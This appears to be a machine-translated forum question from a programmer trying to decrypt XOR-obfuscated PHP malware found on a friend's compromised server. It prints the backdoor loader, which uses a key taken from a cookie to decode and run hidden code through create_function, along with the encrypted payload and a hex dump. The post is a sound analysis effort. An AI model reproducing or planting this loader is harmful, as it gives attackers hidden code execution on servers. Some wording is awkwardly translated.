我朋友的服务器最近被黑了,我试图破译我发现的恶意文件,希望能更好地理解黑客攻击。我可以说他们正在使用XOR密码并且我已经尝试自己学习所有可能的内容,但是虽然我是程序员,但我不是密码学家而且我的大部分内容都是#39;发现已经过了我的脑袋。
打破密码我真的需要做什么?
以下是有问题的代码:
<?php
$vewusl = 'ZW5jMTMz...XBzazt9KCRzJXMn'; //Truncated from 1165 lines of encrypted data by me, the guy asking this question
$_igophqd = create_function ('$vewusl', igophqd (base64_decode (
'VRNSChUZGhAfX1FYQwpBU0IbBwBKBAJQbVQEUAtQUEEQTRQwXXtWcmJwZ29lVmhjIGo'.
'DJ0EndzJ3QzV7D3FRIlg3aSNZfGZhZmB4f2YFfGUwUDQnaDBnMWdmJGVUAFcyRxZrNF'.
'54anFfWlVxcQZ3ZggGISNvIGI3YGE2YjVhbyZmEVY3BXtqZ094fWICK3xvUmUvMlE3c'.
'yd0VARiNkB0MwAGcCFgbFFiUHNncEsjVHEFegckCSBlImdDKGExYmUwYQl2N2BoZlJ1'.
'UnNgYgp1ZTBHJjNSFWYscFMiexNDYTNbKGs+TXR3cQdGdH9yU1NlIFc2InswUDFzVDR'.
'xVXV3JWEkeyRnAVR2T2x1dGJXUnQOSzwgfCRSNnN9LWI2V20ncQ1xIXB/c2JfDmx2RC'.
'tzfxpqNiQIIHwgXmEjZTJ9djBlKH4xBE53dQdOfm9xFmZ0DmUiKWtQbiNgUzlwHFB0I'.
'gAVYCJjb3RjZQZuf2ZSY2RSdTMiCThiN2BhLHZVR2MicQ5iIwQBZXNAA3VmAlZpYQVc'.
'LSZsCmUhWkMtYjZXeylIUHojdw1mYVxvbHNLI1ZyCWY9JmwodiZkUwBhMWVvNEcrVyR'.
'0c2BxcQ5jcmISZn8gfQcna1B2IXB5NnsPZlQmdjNqJHd3fGJiD39/ZjNqciRyLDN/N3'.
'whA3UCUSZudDJcCmIuTXNWd094cWACK1JwDgYnM3wkZSBKeS9iMn1iM1w0agRNe1Z0B'.
'2R7YUsjVnIOAwAifCt6IgJ5NWExcVEkWzx7I1IIcGVfbHFhcQVhYzBDASdrUHUhc182'.
'dSZhfDBYN1Y3Ugx0ZWZ8dHFyKFRmBWE2IwgWYjdgYS52E1ByJmI/cS5dY3x2T1VkZl8'.
'wc1YndjQ7fCR+NnBqJmIzXHQ5YlB4BGMNZndPYGVmZVt2ZgpqAydBJ3cyd0MoYTVQYi'.
'QBIHUzY1Fwdwd0fmVEK2F1J3EiJG8OViFwfiR1DF96MFg3ZjFndHN2BlF4cXYaYWIwe'.
'TI0XiNFJmRlJmslfmQmYgpmNGcBVHR1e1BydlNzcFJ2PTl7O3YiAwQ7ZAx5CEYZSRNC'.
'anp9f3x/cxdoEURFPUEAEVUAVwEaF08USBQSPhdJE0JqandiYXNkbBQqZGMybC0uajU'.
'TORttSBpN'
), $_COOKIE [str_replace('.', '_', $_SERVER['HTTP_HOST'])]) . ';'); $_igophqd($vewusl);
function igophqd ($udopz, $bgsqhbl) { return $udopz ^ str_repeat ($bgsqhbl, ceil (strlen ($udopz) / strlen ($bgsqhbl))); }
我显然无法访问存储在Cookie中的数据。所有恶意文件都是一样的,所以我不认为我们可以使用其中两个来找出密钥。
由于加密代码创建了一个函数,我假设它的可执行PHP可能包含空格,美元符号和其他编码符号。我尝试使用我能找到的所有工具来帮助解决这个问题(xortool,XORRepeatingKeyCrypto,XORSearch & XORStrings,xorbruteforcer,iheartxor,NoMoreXOR)但是请注意,我并没有真正接受任何训练。
根据我的分析,我怀疑该密钥包含x62,长度为32,36或28个字符,但同样,我不是这方面的专家。密钥还可以包含:x16,x17,x0d,x0f,x33,x66,x36,6,T,12 ...
我理解编程部分很好,但我认为拥有上下文可能很有用。这就是我试图破解的密码,我认为这是用重复密钥加密的XOR:
VRNSChUZGhAfX1FYQwpBU0IbBwBKBAJQbVQEUAtQUEEQTRQwXXtWcmJwZ29lVmhjIGoDJ0EndzJ3QzV7D3FRIlg3aSNZfGZhZmB4f2YFfGUwUDQnaDBnMWdmJGVUAFcyRxZrNF54anFfWlVxcQZ3ZggGISNvIGI3YGE2YjVhbyZmEVY3BXtqZ094fWICK3xvUmUvMlE3cyd0VARiNkB0MwAGcCFgbFFiUHNncEsjVHEFegckCSBlImdDKGExYmUwYQl2N2BoZlJ1UnNgYgp1ZTBHJjNSFWYscFMiexNDYTNbKGs+TXR3cQdGdH9yU1NlIFc2InswUDFzVDRxVXV3JWEkeyRnAVR2T2x1dGJXUnQOSzwgfCRSNnN9LWI2V20ncQ1xIXB/c2JfDmx2RCtzfxpqNiQIIHwgXmEjZTJ9djBlKH4xBE53dQdOfm9xFmZ0DmUiKWtQbiNgUzlwHFB0IgAVYCJjb3RjZQZuf2ZSY2RSdTMiCThiN2BhLHZVR2MicQ5iIwQBZXNAA3VmAlZpYQVcLSZsCmUhWkMtYjZXeylIUHojdw1mYVxvbHNLI1ZyCWY9JmwodiZkUwBhMWVvNEcrVyR0c2BxcQ5jcmISZn8gfQcna1B2IXB5NnsPZlQmdjNqJHd3fGJiD39/ZjNqciRyLDN/N3whA3UCUSZudDJcCmIuTXNWd094cWACK1JwDgYnM3wkZSBKeS9iMn1iM1w0agRNe1Z0B2R7YUsjVnIOAwAifCt6IgJ5NWExcVEkWzx7I1IIcGVfbHFhcQVhYzBDASdrUHUhc182dSZhfDBYN1Y3Ugx0ZWZ8dHFyKFRmBWE2IwgWYjdgYS52E1ByJmI/cS5dY3x2T1VkZl8wc1YndjQ7fCR+NnBqJmIzXHQ5YlB4BGMNZndPYGVmZVt2ZgpqAydBJ3cyd0MoYTVQYiQBIHUzY1Fwdwd0fmVEK2F1J3EiJG8OViFwfiR1DF96MFg3ZjFndHN2BlF4cXYaYWIweTI0XiNFJmRlJmslfmQmYgpmNGcBVHR1e1BydlNzcFJ2PTl7O3YiAwQ7ZAx5CEYZSRNCanp9f3x/cxdoEURFPUEAEVUAVwEaF08USBQSPhdJE0JqandiYXNkbBQqZGMybC0uajUTORttSBpN
base64解码版本:
5513520a15191a101f5f5158430a4153421b07004a0402506d5404500b505041104d14305d7b56726270676f65566863206a0327412777327743357b0f71512258376923597c66616660787f66057c653050342768306731676624655400573247166b345e786a715f5a557171067766080621236f2062376061366235616f2666115637057b6a674f787d62022b7c6f52652f3251377327745404623640743300067021606c5162507367704b235471057a0724092065226743286131626530610976376068665275527360620a7565304726335215662c7053227b134361335b286b3e4d7477710746747f72535365205736227b305031735434715575772561247b24670154764f6c7574625752740e4b3c207c245236737d2d6236576d27710d7121707f73625f0e6c76442b737f1a6a362408207c205e612365327d763065287e31044e7775074e7e6f711666740e6522296b506e23605339701c50742200156022636f746365066e7f66526364527533220938623760612c7655476322710e6223040165734003756602566961055c2d266c0a65215a432d6236577b2948507a23770d66615c6f6c734b23567209663d266c2876266453006131656f34472b572474736071710e63726212667f207d07276b5076217079367b0f66542676336a2477777c62620f7f7f66336a7224722c337f377c2103750251266e74325c0a622e4d7356774f787160022b52700e0627337c2465204a792f62327d62335c346a044d7b567407647b614b2356720e0300227c2b7a2202793561317151245b3c7b23520870655f6c716171056163304301276b507521735f367526617c3058375637520c7465667c747172285466056136230816623760612e7613507226623f712e5d637c764f5564665f3073562776343b7c247e36706a2662335c743962507804630d66774f606566655b76660a6a0327412777327743286135506224012075336351707707747e65442b6175277122246f0e5621707e24750c5f7a30583766316774737606517871761a6162307932345e2345266465266b257e6426620a663467015474757b50727653737052763d397b3b762203043b640c790846194913426a7a7d7f7c7f7317681144453d410011550057011a174f144814123e174913426a6a77626173646c142a6463326c2d2e6a3513391b6d481a4d
或者我应该保留base64解码输出中的空格?我猜测我不会保留这些空间,而这正是我应该试图打破的,但这些是我不确定的事情。
我还创建了a gist with the full file contents,以防我们需要$ vewusl中的内容来破解这个密码。